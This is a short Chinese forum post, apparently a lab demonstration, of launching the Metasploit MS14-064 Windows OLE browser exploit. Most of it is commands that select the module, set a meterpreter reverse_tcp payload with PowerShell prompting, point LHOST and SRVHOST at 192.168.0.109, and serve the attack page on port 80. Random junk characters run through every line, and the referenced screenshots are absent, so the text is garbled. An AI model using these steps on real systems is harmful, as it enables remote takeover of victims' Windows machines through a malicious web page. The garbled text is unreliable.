1 r2 @3 U/ p1 I) h 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
* O2 [; V3 C/ b0 A$ H m
2 x4 F9 i T3 ^1 j ~$ i$ w' Q" w0 J8 n2 R
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: + }4 U- y" G" u2 z7 g
: q. r; O1 x; c+ z2 b% P
. V3 ?7 T+ |7 [7 K2 c, l" F! C 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp- L9 e5 e! `' P
. l+ @6 s" H4 d
, B2 k$ Q$ h+ X1 S" I- \# t5 k+ p
set AllowPowershellPrompt true! T4 K) o+ z9 S- t6 {
0 o' l1 h) [9 t9 |0 z4 m
1 T1 a/ I, b! l8 {. a Set LHOST 192.168.0.109 H; X0 X- n% I- B
8 |/ t& a" C" u3 B9 c) d- E& `. @
* x* G5 S- q1 O set SRVHOST 192.168.0.109
6 o. W, R8 ?* ^
C* Q H1 f, ~
: w) i' r7 q2 Q {$ P1 \" w% S3 c
Set uripath share( G- P( g0 U! ]3 n7 e
) C; h8 U2 e' z: o7 f9 }' q
5 i5 y' s# y T* j2 D/ ]/ e) k' H$ p
Set srvport 80% Y+ \9 I7 V9 D, n3 q7 `' G2 _
$ x) x& h5 X! |7 l: R/ B5 G6 D* U% P, o0 G: v9 G7 G
' o) x8 }9 ~, H8 }
" w1 l) [& b+ N$ ?, T% ] o4 o) s- F' L+ x7 w( J
* G, T b( K3 _
2 e+ f2 L U" z- I
2 X4 d2 {3 i# w4 q& w
|3 ?. H; h; _) S6 x" k" O9 N
0 ~/ M f+ y0 C* l' _- Z/ Q
- t4 ]! L B- \7 x/ p5 F, Z
1 I* ]; M4 {+ o& [9 Q; J
5 C, o2 f; o" [7 O4 }3 o
* o- V- ?0 N4 g% P/ ~; |5 j. f$ {
1 X7 ^6 S: _* V7 E2 _4 G. Y" c4 U
# U- E8 i0 \- H# _2 y: G
7 H# d4 Y5 S7 x& k0 d% k: m
下面我们来访问本地地址如图:
9 F! m# d' M% Y" [8 C2 R% x" \
9 k$ G, A- A( r9 x. F. G; Z8 { L
4 C0 k, m/ h6 ]9 L4 u
8 n& i- l2 a3 R- F
: X' ~' ~* c$ L
3 U' J: F) \# H/ J
. l1 v0 f/ i! \3 o ~& `! M) \ `
: t L/ n3 t) i7 l& g8 Y8 r7 [% V- }9 V/ A W- d+ L) H0 c
2 X" V; s G5 ?# `3 j- I